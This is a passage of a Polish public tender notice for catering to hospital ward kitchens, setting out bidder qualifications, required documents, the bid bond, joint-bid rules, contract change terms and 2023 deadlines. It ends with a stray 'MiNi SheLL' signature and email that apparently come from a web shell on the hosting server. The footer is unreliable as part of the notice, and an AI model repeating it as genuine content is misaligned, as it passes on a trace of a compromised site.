finansowej: <br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże:<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonują lub wykonali co najmniej 1 główną usługę polegającą na dostarczaniu posiłków z kuchni zewnętrznej do kuchenek oddziałowych w żywieniu zbiorowym przez okres co najmniej 12 miesięcy na sumę nie mniejszą niż 800 000 PLN; <br/>b) osoby biorące udział w realizacji niniejszego zamówienia, w tym w szczególności osoby wymienione w Rozdziale XIX tej SWZ są zatrudnione na podstawie umowy o pracę;<br/>c) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;<br/>d) dokument potwierdzający dysponowanie obiektem kuchennym do dnia 30.09.2024 r. (akt własności, umowa dzierżawy, najmu, itp.) wraz z decyzją właściwej Stacji Sanitarno-Epidemiologicznej zezwalającej na produkcję posiłków dla podmiotów zewnętrznych;<br/>e) aktualna Decyzja właściwej Stacji Sanitarno-Epidemiologicznej o posiadaniu samochodu dostosowanego do przewozu żywności, spełniającego wszystkie wymagania określone stosownymi przepisami;<br/>f) aktualna Decyzja właściwej Stacji Sanitarno-Epidemiologicznej, że kuchnia w której będą przygotowywane posiłki spełnia wszystkie wymagania określone przepisami dotyczącymi bezpieczeństwa żywności;<br/><br/>Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty określone w rozdziale XIII niniejszej SWZ “INFORMACJA O DOKUMENTACH jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz potwierdzenia braku podstaw wykluczenia Wykonawcy” metodą warunku granicznego – spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dokument potwierdzający dysponowanie obiektem kuchennym do dnia 30.09.2024 r. (akt własności, umowa dzierżawy, najmu, itp.) wraz z decyzją właściwej Stacji Sanitarno-Epidemiologicznej zezwalającej na produkcję posiłków dla podmiotów zewnętrznych; Aktualna Decyzja właściwej Stacji Sanitarno-Epidemiologicznej o posiadaniu samochodu dostosowanego do przewozu żywności, spełniającego wszystkie wymagania określone stosownymi przepisami; Aktualna Decyzja właściwej Stacji Sanitarno-Epidemiologicznej, że kuchnia w której będą przygotowywane posiłki spełnia wszystkie wymagania określone przepisami dotyczącymi bezpieczeństwa żywności; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dokument potwierdzający dysponowanie obiektem kuchennym do dnia 30.09.2024 r. (akt własności, umowa dzierżawy, najmu, itp.) wraz z decyzją właściwej Stacji Sanitarno-Epidemiologicznej zezwalającej na produkcję posiłków dla podmiotów zewnętrznych; Aktualna Decyzja właściwej Stacji Sanitarno-Epidemiologicznej o posiadaniu samochodu dostosowanego do przewozu żywności, spełniającego wszystkie wymagania określone stosownymi przepisami; Aktualna Decyzja właściwej Stacji Sanitarno-Epidemiologicznej, że kuchnia w której będą przygotowywane posiłki spełnia wszystkie wymagania określone przepisami dotyczącymi bezpieczeństwa żywności. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wypełniony i podpisany kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę formularz ofertowy z wykorzystaniem wzoru – załącznik nr 1 do SWZ i załącznik nr 4 do umowy;<br/> 2. Podpisany kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę projekt umowy – załącznik nr 2 do SWZ<br/> 3. Wypełnione i podpisane kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę oświadczenie wykonawcy dotyczące spełniania warunków udziału w postępowaniu zgodnie z załącznikiem nr 3 do SWZ w zakresie wskazanym w Rozdziale XI;<br/> 4. Wypełnione i podpisane kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę oświadczenie wykonawcy dotyczące przesłanek wykluczenia z postępowania - załącznik nr 4 do SWZ - w zakresie wskazanym w Rozdziale XII;<br/> 5. Wypełnione i podpisane kwalifikowanym podpisem elektronicznym/osobistym/zaufanym przez Wykonawcę oświadczenie podmiotu udostępniającego zasoby – załącznik nr 5 do SWZ w zakresie wskazanym w Rozdziale XII;<br/> 6. Wypełnione i podpisane kwalifikowanym podpisem elektronicznym/osobistym/zaufanym przez Wykonawcę oświadczenie wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik nr 6 do SWZ w zakresie wskazanym w Rozdziale XII;<br/> 7. Wypełnione i podpisane kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę oświadczenie art. 13 i art. 14 RODO - załącznik nr 7 do SWZ.<br/> 8. Oświadczenie, o którym mowa w ust. 3-7 tego Rozdziału składają odrębnie:<br/>1) wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>2) podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnianie warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy;<br/>3) podwykonawcy, na których zasobach wykonawca polega przy wykazywaniu spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podwykonawcy.<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusz. Podpisany kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę szczegółowy opis przedmiotu zamówienia – załącznik nr 1 do umowy;<br/>15. Podpisany kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę wymagana gramatura produktów i potraw na jedną porcję posiłku – załącznik nr 2 do umowy;<br/>16. Podpisany kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę protokół zwrotu posiłku – załącznik nr 3 do umowy;<br/> 17. Podpisany kwalifikowanym podpisem elektronicznym/ osobistym/ zaufanym przez Wykonawcę projekt umowy dzierżawy gruntu do przechowywania odpadów kuchennych ulegających biodegradacji/produktów nieprzydatnych do spożycia – załącznik nr 8 do niniejszej SWZ; Dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium w wysokości 42 000,00PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Oferty wspólne, sporządzone przez dwa lub więcej podmiotów zwanych w dalszej treści wykonawcą wspólnym, powinny spełniać następujące wymagania:<br/>a) Oferta, wraz z załącznikami, winna być podpisana przez pełnomocnika – do oferty należy załączyć dokument pełnomocnictwa,<br/>b) Przed zawarciem umowy w sprawie zamówienia publicznego Zamawiający może wymagać dołączenia umowy regulującej współpracę tych Wykonawców, zawierającą co najmniej:<br/>- zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem przedmiot niniejszego zamówienia,<br/>- czas obowiązywania umowy dotyczącej przedmiotu niniejszego zamówienia.<br/>2) Warunki określone przez Zamawiającego w niniejszej SWZ powinny być spełnione przez Wykonawców wspólnych łącznie. Należy zaznaczyć jednocześnie w ofercie, który z Wykonawców odpowiada za spełnienie jakich warunków. <br/>3) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>4) Wykonawcy realizujący wspólnie niniejszą umowę wyznaczają niniejszym spośród siebie Lidera Wykonawcy upoważnionego do zaciągania zobowiązań w imieniu wszystkich Wykonawców realizujących wspólnie umowę, do wystawiania faktur, przyjmowania płatności od Zamawiającego i do przyjmowania poleceń na rzecz i w imieniu wszystkich Wykonawców realizujących wspólnie umowę.<br/>5) Liderem Wykonawcy, o którym mowa w ust. 4 tego paragrafu będzie: …….............…………………..<br/>6) Postanowienia umowy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców realizujących wspólnie umowę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony zobowiązują się nie dokonywać istotnych zmian postanowień umowy w stosunku do treści formularza ofertowego na podstawie której dokonano wyboru Wykonawcy, stanowiącego załącznik nr 1 do niniejszej SWZ, z zastrzeżeniem ust. 2 tego paragrafu.<br/> 2. Zamawiający zastrzega sobie możliwość dokonania zmian postanowień umowy:<br/> 1) w zakresie ceny na podstawie zmiany obowiązującej stawki podatku od towarów i usług VAT. W przypadku zmiany stawki podatku VAT, cena netto nie ulegnie zmianie, a cena brutto zmieni się w wysokości i terminie wynikającym z aktu prawnego wprowadzającego nową stawkę. W takim przypadku wynagrodzenie brutto odpowiednio ulegnie zmianie,<br/> 2) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2020 r. poz. 2207), <br/> 3) zmiany zasad podlegania ubezpieczeniom lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub ubezpieczenie zdrowotne,<br/> 4) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 poz. 1342 oraz z 2022 r. poz. 1079),<br/> 5) zmiany formy zabezpieczenia należytego wykonania umowy,<br/> 6) zmiany osoby/osób wykonujących przedmiot niniejszego zamówienia, o którym mowa w Rozdziale VI niniejszej SWZ wskazanych przez Wykonawcę, pod warunkiem spełniania przez nie wymogów dla osób uczestniczących w realizacji przedmiotu niniejszego zamówienia oraz pisemnej akceptacji Zamawiającego danej osoby.<br/> 3. Warunkiem dokonania zmian postanowień umowy jest złożenie pisemnego wniosku przez Stronę inicjującą wraz z opisem i uzasadnieniem proponowanej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest przedstawić Zamawiającemu okresowy jadłospis, z wyliczoną kalorycznością, zawartością białka, tłuszczów i węglowodanów, zgodny z Rozdziałem II Szczegółowego opisu przedmiotu zamówienia stanowiącego załącznik nr 1 do umowy, będącej załącznikiem nr 2 do tej SWZ, stanowiącego integralną część tej SWZ, po podpisaniu umowy w terminie ustalonym przez strony.

Creat By MiNi SheLL
Email: jattceo@gmail.com